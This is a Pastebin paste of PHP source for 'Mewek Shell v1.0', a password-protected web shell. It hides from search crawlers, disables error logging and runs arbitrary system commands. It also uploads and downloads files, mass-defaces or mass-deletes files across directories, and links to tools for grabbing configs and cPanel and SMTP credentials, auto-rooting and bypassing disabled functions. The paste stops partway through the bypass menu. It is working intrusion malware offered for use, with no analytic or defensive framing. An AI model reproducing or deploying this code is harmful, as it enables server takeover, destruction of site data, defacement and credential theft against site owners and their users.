spiritcode

Mewek Shell v.1.0

Oct 14th, 2018
346
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 102.34 KB | None | 0 0
  1. <!--
  2. Mewek Shell v 1.0 Tuyul
  3. Coded by Rx_XinHad
  4. Default pas : sad
  5. Simple + Responsive shell
  6. otw update new feature > kuntilanak version 2.0
  7. Regards to all member Phoenix Team
  8. -->
  9. <?php
  10. session_start();
  11. error_reporting(0);
  12. set_time_limit(0);
  13. @set_magic_quotes_runtime(0);
  14. @clearstatcache();
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('max_execution_time',0);
  18. @ini_set('output_buffering',0);
  19. @ini_set('display_errors', 0);
  20.  
  21. $auth_pass = "49f0bad299687c62334182178bfd75d8";
  22. $color = "#00ff00";
  23. $default_action = 'FilesMan';
  24. $default_use_ajax = true;
  25. $default_charset = 'UTF-8';
  26. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  27. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  28. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  29. header('HTTP/1.0 404 Not Found');
  30. exit;
  31. }
  32. }
  33.  
  34. function login_shell() {
  35. ?>
  36. <html>
  37. <head>
  38. <title>Mewek</title>
  39. <style type="text/css">
  40. html {
  41. margin: 20px auto;
  42. background: #000000;
  43. color: #4c83af;
  44. text-align: center;
  45. }
  46. header {
  47. margin: 10px auto;
  48. }
  49. input[type=password] {
  50. width: 250px;
  51. height: 25px;
  52. color: red;
  53. background: #000000;
  54. border: 1px dotted #4c83af;
  55. padding: 5px;
  56. margin-left: 20px;
  57. text-align: center;
  58. }
  59. </style>
  60. </head>
  61. <center>
  62. <header>
  63. <pre>
  64. _____ ___________ __ __ ___________ ____ __. ____ _______
  65. / \ \_ _____/ / \ / \ \_ _____/ | |/ _| ___ __ /_ | \ _ \
  66. / \ / \ | __)_ \ \/\/ / | __)_ | < \ \/ / | | / /_\ \
  67. / Y \ | \ \ / | \ | | \ \ / | | \ \_/ \
  68. \____|__ / /_______ / \__/\ / /_______ / |____|__ \ \_/ |___| /\ \_____ /
  69. \/ \/ \/ \/ \/ \/ \/
  70. </pre>
  71. </header>
  72. <form method="post">
  73. <input type="password" name="pass">
  74. </form>
  75. <?php
  76. exit;
  77. }
  78. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  79. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  80. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  81. else
  82. login_shell();
  83. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  84. @ob_clean();
  85. $file = $_GET['file'];
  86. header('Content-Description: File Transfer');
  87. header('Content-Type: application/octet-stream');
  88. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  89. header('Expires: 0');
  90. header('Cache-Control: must-revalidate');
  91. header('Pragma: public');
  92. header('Content-Length: ' . filesize($file));
  93. readfile($file);
  94. exit;
  95. }
  96. // Encrypt Source
  97. $style ="zVddb6w2EH3eSPkPlqJK91ZA+Nhukl1dtU9RX/p4n6qoMmAWN4CRGbq7uep/r40xGDDJtmqlCkXaGHvmzJkzM+YnWtaMA2p58SkHqJv9/X3GKmi8I2PHguCaNl7CyvukaX7McEmLy5evcVtB+/lwe/M9+nZ7g5A84KqXe6Teol9YxZyGcJqJfX/e3sQsvajdMU5ej5y1VbpHd77vHwYTDX0jexSE9blbS1jBuNiTZdm450ToMYc92nYHheHbm5z3hhlPiTgQ1GfUsIKm6C4MQ70Lq03a6DZ5jLCyC+QMbkoSxjFQVu1RxSoyHNvn7A/Cp4efn5/Hk02OU3baI1+4la4fxN8ppzCYqDlRx2ucprQ6iq3osYuxe50xXqr3KW3qAgsOaVXQEQLguCAIcqfuUbS8kTBSkuG2AL3Nay4NkN7UZmbLjQuWvHagDRyRgLrr2UaoxPxIKzdmAKwUIPtlW2oGsg2ugyf59K87AtymxgmRfJ44rhXOuxLTyiKEIAi6o27J3lxl3OU4pW0j3Pq927X1E00hl//73x0mRAu8JtV3OcGpTmaXPFzQo8h4QTLoTioOdPBjwuYWIFVGrt2fB0apKDJDjV5oOn6l4ALHVSPVsEecAQbyyQ0iL3pIyfHzyM2Hu/4GJOx45FwLTZOCNtArfVYoqvrUyZJU7Tu5Gzx3vG8N3jlphFLV0X+UYUttGxXcKTzvO0OgFW3FqMPCGM8w66I0ONtO5eNJ5miVMbPfuFI7a8C09d3csiRIuuzBjuYhLhoEvUR1SOG2Py/yAzTBhdZtSdO0GBqFd8QXkdJFuzIATXrow9hDx0P/shoLAiBIkp1ABz74lHIqqUVQ4ZN8DisxrPXrNWf2FjZTmmZ4pXrmSlDQzdkwCSDayeeD6r6KTnOTck2ruoU3x6s5K2twPDgD5gS/U5e6eHwzcN3mDeFGT/K5eh6bYtboBnxxC4uON3I/QTnODUuyV4e6WbpGq9ENTTlfHQwyn/7iDDYmw9qFYNisR8A6nxropD2t1jKwetaxJ4ob3OYGr9NKnldR734wuJuJeDDJV4UcPMpnvGKQUlzvLnR2XxkK8KPZ43XdU11orAmaVeXuqvavveqkGp7NcJXv3NEM2gN9p0cqA1emvSesjbuhCak4tJlGu9EohYD9Oc48XN5SElKJ9raozx+sVZXIx9oVd/YOOFu2BLZG+XJwBot4ZreKJEnGXnqJ2fk/uxt8hHTR2Ts0mv53yNhu13rWWhXMKrpiQDOLFA1L2rj+TFpJmbUXaBTRsir6mCfDWKGZpck31J8xBra7M5duF6LUyVkbydrDoknZ70SOyov4Zesbo86cvnoC/YPbW5U4IWOQg/Nb/0EzpqCbwrV4V8m4NrYRlIZxGB+WJZ2Pn6ddELrG+1uiKtWNTo1kCeEWmFw0v6J/ZqJr4N8l0o0xdtXk3Yw8B5Gmqpu6v8KlJl9kYC8OMlZq3DQnEcWLYyzK1kThRfKzMfVnRo8G//qLVmP3dYpXcS9QaiJDC4/TCP5X0JRYpA4FHAPNXRRFB4Vg/Ejyutn2Wy6czcbq2q1HHPoL";
  98. ?>
  99. <html>
  100. <head>
  101. <title>Mewek</title>
  102. <meta name='author' content='Mewek'>
  103. <meta charset="UTF-8">
  104. <style type='text/css'><?php echo gzinflate(base64_decode($style)); ?></style>
  105. </head>
  106. <?php
  107. function w($dir,$perm) {
  108. if(!is_writable($dir)) {
  109. return "<font color=red>".$perm."</font>";
  110. } else {
  111. return "<font color=#4c83af>".$perm."</font>";
  112. }
  113. }
  114. function r($dir,$perm) {
  115. if(!is_readable($dir)) {
  116. return "<font color=red>".$perm."</font>";
  117. } else {
  118. return "<font color=#4c83af>".$perm."</font>";
  119. }
  120. }
  121. function exe($cmd) {
  122. if(function_exists('system')) {
  123. @ob_start();
  124. @system($cmd);
  125. $buff = @ob_get_contents();
  126. @ob_end_clean();
  127. return $buff;
  128. } elseif(function_exists('exec')) {
  129. @exec($cmd,$results);
  130. $buff = "";
  131. foreach($results as $result) {
  132. $buff .= $result;
  133. } return $buff;
  134. } elseif(function_exists('passthru')) {
  135. @ob_start();
  136. @passthru($cmd);
  137. $buff = @ob_get_contents();
  138. @ob_end_clean();
  139. return $buff;
  140. } elseif(function_exists('shell_exec')) {
  141. $buff = @shell_exec($cmd);
  142. return $buff;
  143. }
  144. }
  145. function perms($file){
  146. $perms = fileperms($file);
  147. if (($perms & 0xC000) == 0xC000) {
  148. // Socket
  149. $info = 's';
  150. } elseif (($perms & 0xA000) == 0xA000) {
  151. // Symbolic Link
  152. $info = 'l';
  153. } elseif (($perms & 0x8000) == 0x8000) {
  154. // Regular
  155. $info = '-';
  156. } elseif (($perms & 0x6000) == 0x6000) {
  157. // Block special
  158. $info = 'b';
  159. } elseif (($perms & 0x4000) == 0x4000) {
  160. // Directory
  161. $info = 'd';
  162. } elseif (($perms & 0x2000) == 0x2000) {
  163. // Character special
  164. $info = 'c';
  165. } elseif (($perms & 0x1000) == 0x1000) {
  166. // FIFO pipe
  167. $info = 'p';
  168. } else {
  169. // Unknown
  170. $info = 'u';
  171. }
  172. // Owner
  173. $info .= (($perms & 0x0100) ? 'r' : '-');
  174. $info .= (($perms & 0x0080) ? 'w' : '-');
  175. $info .= (($perms & 0x0040) ?
  176. (($perms & 0x0800) ? 's' : 'x' ) :
  177. (($perms & 0x0800) ? 'S' : '-'));
  178. // Group
  179. $info .= (($perms & 0x0020) ? 'r' : '-');
  180. $info .= (($perms & 0x0010) ? 'w' : '-');
  181. $info .= (($perms & 0x0008) ?
  182. (($perms & 0x0400) ? 's' : 'x' ) :
  183. (($perms & 0x0400) ? 'S' : '-'));
  184. // World
  185. $info .= (($perms & 0x0004) ? 'r' : '-');
  186. $info .= (($perms & 0x0002) ? 'w' : '-');
  187. $info .= (($perms & 0x0001) ?
  188. (($perms & 0x0200) ? 't' : 'x' ) :
  189. (($perms & 0x0200) ? 'T' : '-'));
  190. return $info;
  191. }
  192. function hdd($s) {
  193. if($s >= 1073741824)
  194. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  195. elseif($s >= 1048576)
  196. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  197. elseif($s >= 1024)
  198. return sprintf('%1.2f',$s / 1024 ) .' KB';
  199. else
  200. return $s .' B';
  201. }
  202. function ambilKata($param, $kata1, $kata2){
  203. if(strpos($param, $kata1) === FALSE) return FALSE;
  204. if(strpos($param, $kata2) === FALSE) return FALSE;
  205. $start = strpos($param, $kata1) + strlen($kata1);
  206. $end = strpos($param, $kata2, $start);
  207. $return = substr($param, $start, $end - $start);
  208. return $return;
  209. }
  210. function getsource($url) {
  211. $curl = curl_init($url);
  212. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  213. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  214. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  215. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  216. $content = curl_exec($curl);
  217. curl_close($curl);
  218. return $content;
  219. }
  220. function bing($dork) {
  221. $npage = 1;
  222. $npages = 30000;
  223. $allLinks = array();
  224. $lll = array();
  225. while($npage <= $npages) {
  226. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  227. if($x) {
  228. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  229. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  230. $npage = $npage + 10;
  231. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  232. } else break;
  233. }
  234. $URLs = array();
  235. foreach($allLinks as $url){
  236. $exp = explode("/", $url);
  237. $URLs[] = $exp[2];
  238. }
  239. $array = array_filter($URLs);
  240. $array = array_unique($array);
  241. $sss = count(array_unique($array));
  242. foreach($array as $domain) {
  243. echo $domain."\n";
  244. }
  245. }
  246. function reverse($url) {
  247. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  248. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  249. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  250. curl_setopt($ch, CURLOPT_HEADER, 0);
  251. curl_setopt($ch, CURLOPT_POST, 1);
  252. $resp = curl_exec($ch);
  253. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  254. $array = explode(",,", $resp);
  255. unset($array[0]);
  256. foreach($array as $lnk) {
  257. $lnk = "http://$lnk";
  258. $lnk = str_replace(",", "", $lnk);
  259. echo $lnk."\n";
  260. ob_flush();
  261. flush();
  262. }
  263. curl_close($ch);
  264. }
  265. if(get_magic_quotes_gpc()) {
  266. function idx_ss($array) {
  267. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  268. }
  269. $_POST = idx_ss($_POST);
  270. $_COOKIE = idx_ss($_COOKIE);
  271. }
  272.  
  273. if(isset($_GET['dir'])) {
  274. $dir = $_GET['dir'];
  275. chdir($dir);
  276. } else {
  277. $dir = getcwd();
  278. }
  279. $kernel = php_uname();
  280. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  281. $dir = str_replace("\\","/",$dir);
  282. $scdir = explode("/", $dir);
  283. $freespace = hdd(disk_free_space("/"));
  284. $total = hdd(disk_total_space("/"));
  285. $used = $total - $freespace;
  286. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=#4c83af>OFF</font>";
  287. $ds = @ini_get("disable_functions");
  288. $mysql = (function_exists('mysql_connect')) ? "<font color=#4c83af>ON</font>" : "<font color=red>OFF</font>";
  289. $curl = (function_exists('curl_version')) ? "<font color=#4c83af>ON</font>" : "<font color=red>OFF</font>";
  290. $wget = (exe('wget --help')) ? "<font color=#4c83af>ON</font>" : "<font color=red>OFF</font>";
  291. $perl = (exe('perl --help')) ? "<font color=#4c83af>ON</font>" : "<font color=red>OFF</font>";
  292. $python = (exe('python --help')) ? "<font color=#4c83af>ON</font>" : "<font color=red>OFF</font>";
  293. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=#4c83af>NONE</font>";
  294. if(!function_exists('posix_getegid')) {
  295. $user = @get_current_user();
  296. $uid = @getmyuid();
  297. $gid = @getmygid();
  298. $group = "?";
  299. } else {
  300. $uid = @posix_getpwuid(posix_geteuid());
  301. $gid = @posix_getgrgid(posix_getegid());
  302. $user = $uid['name'];
  303. $uid = $uid['uid'];
  304. $group = $gid['name'];
  305. $gid = $gid['gid'];
  306. }
  307. // Menu Shell
  308. echo "<center>";
  309. echo "<table id='header'>
  310. <tr><td style='width:80px;'>
  311. <table>
  312. <tr><td>
  313. <h1><a href='?'>Mewek</a></h1></td></tr>
  314. <tr><td style='text-align:right;'>
  315. <div class='ver'>1.0 Tuyul</div>
  316. </td></tr>
  317. </table></td>
  318. </tr></table>";
  319. echo "</center>";
  320. echo "<hr>";
  321. echo "<table width=100% align=center>";
  322. echo "<tr><td class='system'>System:</td> <td class='system'> <font color=#4c83af>".$kernel."</font></td></tr>";
  323. echo "<tr><td class='system'>User:</td> <td class='system'><font color=#4c83af>".$user."</font> (".$uid.") Group: <font color=#4c83af>".$group."</font> (".$gid.")</td></tr>";
  324. echo "<tr><td class='system'>Server IP:</td> <td class='system'><font color=#4c83af>".$ip."</font> | Your IP: <font color=#4c83af>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  325. echo "<tr><td class='system'>HDD:</td> <td class='system'><font color=#4c83af>$used</font> / <font color=#4c83af>$total</font> ( Free: <font color=#4c83af>$freespace</font> )</td></tr>";
  326. echo "<tr><td class='system'>Safe Mode:</td> <td class='system'>$sm</td></tr>";
  327. echo "<tr><td class='system'>Disable Functions:</td> <td class='system'>$show_ds</td></tr>";
  328. echo "<tr><td class='system'>Info:</td> <td class='system'>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  329. echo "<tr><td class='system'>Current DIR:</td><td class='system'> ";
  330. foreach($scdir as $c_dir => $cdir) {
  331. echo "<a href='?dir=";
  332. for($i = 0; $i <= $c_dir; $i++) {
  333. echo $scdir[$i];
  334. if($i != $c_dir) {
  335. echo "/";
  336. }
  337. }
  338. echo "'>$cdir</a>/";
  339. }
  340. echo "&nbsp;&nbsp;<td class='system'>[ ".w($dir, perms($dir))." ]</td></td></tr>";
  341. echo "</center>";
  342. echo "</table>";
  343. echo "<hr>";
  344. echo "<div id='menu'>";
  345. echo "<table style='width:100%;'><tr>";
  346. echo "<td><a href='?' title='Home'><div class='menumi'>Home</span>
  347. </div></a></td>";
  348. echo "<td><a href='?dir=$dir&do=upload' title='Upload'><div class='menumi'>Upload</div></a></td>";
  349. echo "<td><a href='?dir=$dir&do=masal' title='Mass Deface'><div class='menumi'>Mass</div></a></td>";
  350. echo "<td><a href='?dir=$dir&do=grab' title='Grabber'><div class='menumi'>Grabber</div></a></td>";
  351. echo "<td><a href='?dir=$dir&do=submiter' title='Submiter'><div class='menumi'>Submiter</div></a></td>";
  352. echo "<td><a href='?dir=$dir&do=cracker' title='Cracker'><div class='menumi'>Cracker</div></a></td>";
  353. echo "<td><a href='?dir=$dir&do=exploiter' title='Exploiter'><div class='menumi'>Exploiter</div></a></td>";
  354. echo "<td><a href='?dir=$dir&do=bypass' title='Bypass Tools'><div class='menumi'>Bypass</div></a></td>";
  355. echo "<td><a href='?dir=$dir&do=symlink' title='Symlink Tools'><div class='menumi'>Symlink</div></a></td>";
  356. echo "<td><a style='color: red;' href='?logout=true'><div class='menumi'>Logout</div></a></td>";
  357. echo "<td><form method='post' action='?dir=$dir&do=cmd'>
  358. <span class='prompt'>".$user." ></span>
  359. <input class='inputz' type='text' width='20%' name='cmd'><input class='inputzbut' type='submit' name='do_cmd' value='>>'>
  360. </form>
  361. </td>";
  362. echo "</tr>";
  363. echo "</table>";
  364. echo "</div>";
  365. echo "<hr>";
  366. if($_GET['logout'] == true) {
  367. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  368. echo "<script>window.location='?';</script>";
  369. }
  370. // Upload
  371. elseif($_GET['do'] == 'upload') {
  372. echo "<center>";
  373. if($_POST['upload']) {
  374. if($_POST['tipe_upload'] == 'biasa') {
  375. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  376. $act = "<br><font color=#4c83af>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  377. } else {
  378. $act = "<br><font color=red>failed to upload file</font>";
  379. }
  380. } else {
  381. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  382. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  383. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  384. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  385. $act = "<br><font color=#4c83af>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  386. } else {
  387. $act = "<br><font color=red>failed to upload file</font>";
  388. }
  389. } else {
  390. $act = "<br><font color=red>failed to upload file</font>";
  391. }
  392. }
  393. }
  394. echo "Upload File:
  395. <form method='post' enctype='multipart/form-data'>
  396. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  397. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  398. <input type='file' name='ix_file'>
  399. <input type='submit' value='upload' name='upload'>
  400. </form>";
  401. echo $act;
  402. echo "</center>";
  403. }
  404. // Command
  405. elseif($_GET['do'] == 'cmd') {
  406. if($_POST['do_cmd']) {
  407. echo "<pre>".exe($_POST['cmd'])."</pre>";
  408. }
  409. }
  410. // Mass Deface
  411. elseif($_GET['do'] == 'mass_deface') {
  412. echo "<center><form action=\"\" method=\"post\">\n";
  413. $dirr=$_POST['d_dir'];
  414. $index = $_POST["script"];
  415. $index = str_replace('"',"'",$index);
  416. $index = stripslashes($index);
  417. function edit_file($file,$index){
  418. if (is_writable($file)) {
  419. clear_fill($file,$index);
  420. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  421. }
  422. else {
  423. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  424. }
  425. }
  426. function hapus_massal($dir,$namafile) {
  427. if(is_writable($dir)) {
  428. $dira = scandir($dir);
  429. foreach($dira as $dirb) {
  430. $dirc = "$dir/$dirb";
  431. $lokasi = $dirc.'/'.$namafile;
  432. if($dirb === '.') {
  433. if(file_exists("$dir/$namafile")) {
  434. unlink("$dir/$namafile");
  435. }
  436. } elseif($dirb === '..') {
  437. if(file_exists("".dirname($dir)."/$namafile")) {
  438. unlink("".dirname($dir)."/$namafile");
  439. }
  440. } else {
  441. if(is_dir($dirc)) {
  442. if(is_writable($dirc)) {
  443. if(file_exists($lokasi)) {
  444. echo "[<font color=#4c83af>DELETED</font>] $lokasi<br>";
  445. unlink($lokasi);
  446. $idx = hapus_massal($dirc,$namafile);
  447. }
  448. }
  449. }
  450. }
  451. }
  452. }
  453. }
  454. function clear_fill($file,$index){
  455. if(file_exists($file)){
  456. $handle = fopen($file,'w');
  457. fwrite($handle,'');
  458. fwrite($handle,$index);
  459. fclose($handle); } }
  460.  
  461. function gass(){
  462. global $dirr , $index ;
  463. chdir($dirr);
  464. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  465. $files = scandir($dirr) ;
  466. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  467. sort($files);
  468. $n = 0 ;
  469. foreach ($files as $file){
  470. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  471. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  472. edit_file($file,$index);
  473. flush();
  474. $n = $n +1 ;
  475. }
  476. }
  477. echo "<br>";
  478. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  479. }
  480. function ListFiles($dirrall) {
  481.  
  482. if($dh = opendir($dirrall)) {
  483.  
  484. $files = Array();
  485. $inner_files = Array();
  486. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  487. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  488. while($file = readdir($dh)) {
  489. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  490. if(is_dir($dirrall . "/" . $file)) {
  491. $inner_files = ListFiles($dirrall . "/" . $file);
  492. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  493. } else {
  494. array_push($files, $dirrall . "/" . $file);
  495. }
  496. }
  497. }
  498.  
  499. closedir($dh);
  500. return $files;
  501. }
  502. }
  503. function gass_all(){
  504. global $index ;
  505. $dirrall=$_POST['d_dir'];
  506. foreach (ListFiles($dirrall) as $key=>$file){
  507. $file = str_replace('//',"/",$file);
  508. echo "<center><strong>$file</strong> ===>";
  509. edit_file($file,$index);
  510. flush();
  511. }
  512. $key = $key+1;
  513. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  514. function sabun_massal($dir,$namafile,$isi_script) {
  515. if(is_writable($dir)) {
  516. $dira = scandir($dir);
  517. foreach($dira as $dirb) {
  518. $dirc = "$dir/$dirb";
  519. $lokasi = $dirc.'/'.$namafile;
  520. if($dirb === '.') {
  521. file_put_contents($lokasi, $isi_script);
  522. } elseif($dirb === '..') {
  523. file_put_contents($lokasi, $isi_script);
  524. } else {
  525. if(is_dir($dirc)) {
  526. if(is_writable($dirc)) {
  527. echo "[<font color=#4c83af>DONE</font>] $lokasi<br>";
  528. file_put_contents($lokasi, $isi_script);
  529. $idx = sabun_massal($dirc,$namafile,$isi_script);
  530. }
  531. }
  532. }
  533. }
  534. }
  535. }
  536. if($_POST['mass'] == 'onedir') {
  537. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  538. $ini="http://";
  539. $mainpath=$_POST[d_dir];
  540. $file=$_POST[d_file];
  541. $dir=opendir("$mainpath");
  542. $code=base64_encode($_POST[script]);
  543. $indx=base64_decode($code);
  544. while($row=readdir($dir)){
  545. $start=@fopen("$row/$file","w+");
  546. $finish=@fwrite($start,$indx);
  547. if ($finish){
  548. echo"$ini$row/$file\n";
  549. }
  550. }
  551. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  552. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  553. $dir=opendir("$mainpath");
  554. $code=base64_encode($_POST[script]);
  555. $indx=base64_decode($code);
  556. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  557. $finish=@fwrite($start,$indx);
  558. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  559. }
  560.  
  561. }
  562. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  563. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  564. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  565. elseif($_POST['mass'] == 'massdeface') {
  566. echo "<div style='margin: 5px auto; padding: 5px'>";
  567. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  568. echo "</div>"; }
  569. else {
  570. echo "
  571. <center><font style='text-decoration: underline;'>
  572. Select Type:<br>
  573. </font>
  574. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  575. <option value=\"onedir\">Mass Deface 1 Dir</option>
  576. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  577. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  578. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  579. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  580. <font style='text-decoration: underline;'>Folder:</font><br>
  581. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  582. <font style='text-decoration: underline;'>Filename:</font><br>
  583. <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
  584. <font style='text-decoration: underline;'>Index File:</font><br>
  585. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Rx_XinHad</textarea><br>
  586. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  587. </form></center>";
  588. }
  589. }
  590. //Submenu
  591. elseif($_GET['do'] == 'grab') {
  592. echo"<div class='mybox'>
  593. <h2>Grabber Tools</h2>
  594. <center>
  595. <table style='width:30%; align:center;'><tr>
  596. <td><a href='?dir=$dir&do=config' title='Config'><div class='menumi'>Grab Config</div></a></td>
  597. <td><a href='?dir=$dir&do=cpanel' title='Cpanel Crack' ><div class='menumi'>Grab Cpanel</div></a></td>
  598. <td><a href='?dir=$dir&do=smtp' title='SMTP Grabber'><div class='menumi'>Grab SMTP</div></a></td>
  599. </tr>
  600. </table>
  601. </center>
  602. <div>";
  603. }
  604. elseif($_GET['do'] == 'submiter') {
  605. echo"<div class='mybox'>
  606. <h2>Submiter Tools</h2>
  607. <center>
  608. <table style='width:30%; align:center;'><tr>
  609. <td><a href='?dir=$dir&do=zoneh' title='Submit Zone-H'><div class='menumi'>Zone-H</div></a></td>
  610. </tr>
  611. </table>
  612. </center>
  613. <div>";
  614. }
  615. elseif($_GET['do'] == 'cracker') {
  616. echo"<div class='mybox'>
  617. <h2>Cracker Tools</h2>
  618. <center>
  619. <table style='width:30%; align:center;'><tr>
  620. <td><a href='?dir=$dir&do=krdp_shell' title='K-RDP Shell' ><div class='menumi'>K-RDP Shell</div></a></td>
  621. <td><a href='?dir=$dir&do=awto_root' title='Auto Root' ><div class='menumi'>Auto Root/</div></a></td>
  622. </tr>
  623. </table>
  624. </center>
  625. <div>";
  626. }
  627. elseif($_GET['do'] == 'cracker') {
  628. echo"<div class='mybox'>
  629. <h2>Cracker Tools</h2>
  630. <center>
  631. <table style='width:30%; align:center;'><tr>
  632. <td><a href='?dir=$dir&do=krdp_shell' title='K-RDP Shell' ><div class='menumi'>K-RDP Shell</div></a></td>
  633. <td><a href='?dir=$dir&do=awto_root' title='Auto Root' ><div class='menumi'>Auto Root/</div></a></td>
  634. </tr>
  635. </table>
  636. </center>
  637. <div>";
  638. }
  639. elseif($_GET['do'] == 'exploiter') {
  640. echo"<div class='mybox'>
  641. <h2>Exploiter Tools</h2>
  642. <center>
  643. <table style='width:30%; align:center;'><tr>
  644. <td><a href='?dir=$dir&do=cgi' title='Cgi Telnet'><div class='menumi'>Cgi Telnet</div></a></td>
  645. <td><a href='?dir=$dir&do=network' title='Network'><div class='menumi'>Network</div></a></td>
  646. <td><a href='?dir=$dir&do=adminer' title='Adminer'><div class='menumi'>Adminer</div></a></td>
  647. <td><a href='?dir=$dir&do=jumping' title='Jumping'><div class='menumi'>Jumping</div></a></td>
  648. </tr>
  649. </table>
  650. </center>
  651. <div>";
  652. }
  653. elseif($_GET['do'] == 'masal') {
  654. echo"<div class='mybox'>
  655. <h2>Mass Tools</h2>
  656. <center>
  657. <table style='width:30%; align:center;'><tr>
  658. <td><a href='?dir=$dir&do=mass_deface' title='Mass Deface'><div class='menumi'>Mass Deface</div></a></td>
  659. <td><a href='?dir=$dir&do=fake_root' title='Fake Root'><div class='menumi'>Fake Root</div></a></td>
  660. <td><a href='?dir=$dir&do=cpftp_auto' title='Cp/FTP Auto Deface' ><div class='menumi'>Cp/FTP Auto Deface</div></a></td>
  661. </tr>
  662. </table>
  663. </center>
  664. <div>";
  665. }
  666. elseif($_GET['do'] == 'bypass') {
  667. echo"<div class='mybox'>
  668. <h2>Bypass Tools</h2>
  669. <center>
  670. <table style='width:30%; align:center;'><tr>
  671. <td><a href='?dir=$dir&bypass=disablefunc' title='Bypass Disable Functions'><div class='menumi'>Bypass Disable Functions</div></a></td>
